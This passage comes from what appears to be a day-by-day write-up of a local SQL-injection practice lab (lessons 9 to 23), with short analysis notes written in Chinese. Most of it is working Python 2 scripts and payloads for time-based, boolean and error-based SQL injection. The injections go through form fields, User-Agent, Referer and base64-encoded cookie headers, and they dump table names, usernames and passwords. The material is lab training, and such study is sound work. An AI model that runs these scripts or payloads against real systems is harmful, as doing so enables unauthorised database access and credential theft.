                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s')  and sleep(2)--+" %(i,tname,dname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1))  and sleep(2)--+" %(tname,dname,cnum,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if clock()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(%s) FROM %s.%s)  and sleep(2)--+" %(i,cname,dname,tname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))  and sleep(2)--+" %(cname, dname, tname, n, i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d'  and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day10-Less10

分析

同 9
只是单引号改双引号

代码

from requests import get
from time import *

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and length(database())=%d  and sleep(2)--+" %i)
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
            html = r.text
            if clock()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s')  and sleep(2)--+" %(i,name))
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1))  and sleep(2)--+" %(name,n,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(DBName,no,i+1,n))
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s')  and sleep(2)--+" %(i,tname,dname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1))  and sleep(2)--+" %(tname,dname,cnum,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if clock()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(%s) FROM %s.%s)  and sleep(2)--+" %(i,cname,dname,tname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))  and sleep(2)--+" %(cname, dname, tname, n, i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d'  and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

s = clock()  
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'

Day11-Less11

分析

select XX,XX,XX from XX where username = '$uname' and password = '$passwd'
1' group by 3#
报错

select XX,XX from XX where username = '$uname' and password = '$passwd'

Username:' or 1 limit 1,2#
Password:(任意)

Day12-Less12

分析

select XX,XX,XX from XX where username = ("$uname") and password = ("$passwd")
1") group by 3#
报错

select XX,XX from XX where username = ("$uname") and password = ("$passwd")

Username:") or 1 limit 1,2#
Password:(任意)

Day13-Less13

分析

select XX,XX from XX where username = ('$uname') and password = ('$passwd')


') union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) #

Day14-Less14

分析

select XX,XX from XX where username = "$uname" and password = "$passwd"

" union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) #

Day15-Less15

分析

select XX,XX from XX where username = '$uname' and password = '$passwd'
1' or 1 #

代码

from requests import post

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        payload = {'uname': "0' or length(database())=%d#" %i, 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            payload = {'uname': "0' or ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
            r = post("http://localhost/sqllab/Less-15/",data=payload)
            html = r.text
            if 'flag.jpg' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}                        
                r = post("http://localhost/sqllab/Less-15/",data=payload)
                html = r.text
                if 'flag.jpg' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}  
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}          
                    r = post("http://localhost/sqllab/Less-15/",data=payload)
                    html = r.text
                    if 'flag.jpg' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-15/?id=",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        r = post("http://localhost/sqllab/Less-15/",data=payload)
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'flag.jpg' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day16-Less16

分析

select XX,XX from XX where username = ("$uname") and password = ("$passwd")

1") or 1#

1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=8#
1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),1,1))=115#

代码

from requests import post
from time import *

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': '1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=%d#' %i, 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
            r = post("http://localhost/sqllab/Less-16/",data=payload)

            if clock()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}                        
                r = post("http://localhost/sqllab/Less-16/",data=payload)

                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}  
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}          
                    r = post("http://localhost/sqllab/Less-16/",data=payload)

                    if clock()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-16/?id=",data=payload)

        if clock()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        r = post("http://localhost/sqllab/Less-16/",data=payload)
                        break
                    except:
                        print 'Relaxing...'

                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

s = clock()                     
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'

Day17-Less17

分析

UPDATE table SET password = '' WHERE username = 'Dhakkan'

基于报错注入:
UPDATE users SET password = ''+(select updatexml(1,concat('*',(select * from (select username from security.users limit 0,1)x),'*',(select * from (select password from security.users limit 0,1)x)),1))+'' WHERE username = 'Dhakkan';


(通过子查询,使 select 的表更换一个名称,解决在同一语句中不能先 select 出同一表中的某些值,再 update 这个表的限制)
UPDATE users SET password = ''+(select 1 from (select 1) as a where updatexml(1,concat('*',(select username from security.users as x limit 0,1)),1))+'' WHERE username = 'Dhakkan';
会报错:
即"ERROR 1093 (HY000): You can't specify target table 'users' for update in FROM clause"


盲注也行:
基于时间
select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c);
select(select if(length(database())=8,sleep(1),'1') From ((select 1 as a) union (select 2 as b)) as c);

或者基于正则

select(select 'a' REGEXP (case when length(database())=8 then '.*' else '*' end) From ((select 1 as a) union (select 2 as b)) as c);

即
UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';
或者
UPDATE users SET password = ''+(select(select 'a' REGEXP (case when length(database())=8 then '.*' else '*' end) From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';

UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From (select 1,2)))+'' WHERE username = 'Dhakkan';

from requests import *
pdata = {
'uname': "Dhakkan",
'passwd':"'+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'"
}
print post('http://localhost/sqllab/Less-17/', data = pdata).text

Day18-Less18

分析

想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','','')

x'
::1', 'Dhakkan')
('x'','   ::1','')

x' or 1
', '::1', 'Dhakkan')
('x' or 1    ','','')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("useragent","ip","username") VALUES('','::1','Dhakkan');
->
INSERT INTO("useragent","ip","username") VALUES('')#','::1','Dhakkan');

('') or 1#','','')
or 1#', '::1', 'Dhakkan')
INSERT INTO("useragent","ip","username") VALUES('') or 1#','::1','Dhakkan');


INSERT INTO("useragent","ip","username") VALUES('
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '
','::1','Dhakkan');


us 注入:
时间
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

代码

from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
headers = {
'User-Agent': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '",
}

print post('http://localhost/sqllab/Less-18/', headers = headers,data=pdata).text

Day19-Less19

分析

想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','')

x'
::1')
('x'','   ::1')

x' or 1
', '::1')
('x' or 1    ','::1')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("referer","ip") VALUES('','::1');
->
INSERT INTO("referer","ip") VALUES('')#','::1');

('') or 1#','','')
or 1#', '::1')
INSERT INTO("referer","ip") VALUES('') or 1#','::1');


INSERT INTO("referer","ip") VALUES('
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '
','::1');


us 注入:
时间
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

代码

from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
headers = {
'referer': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '"
}

print post('http://localhost/sqllab/Less-19/', headers = headers,data=pdata).text

Day20-Less20

分析

select XX,XX from XXXX where username='$cookie' LIMIT 0,1
dhakkan'
'dhakkan'' LIMIT 0,1

select XX,XX from XXXX where username='
' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#
' LIMIT 0,1

比较简单

代码

from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
u = "uname=' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#"
headers = {
'cookie': u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-20/', headers = headers).text

Day21-Less21

分析

b64encode("
troy'
")
->
'troy'') LIMIT 0,1

troy')

') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#

代码

from requests import *
from base64 import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

u = b64encode("') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-21/', headers = headers).text

Day22-Less22

分析

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
和 21 一样,只不过单引号改双引号

代码

from requests import *
from base64 import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-22/', headers = headers).text

Day23-Less23

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'-- -
->
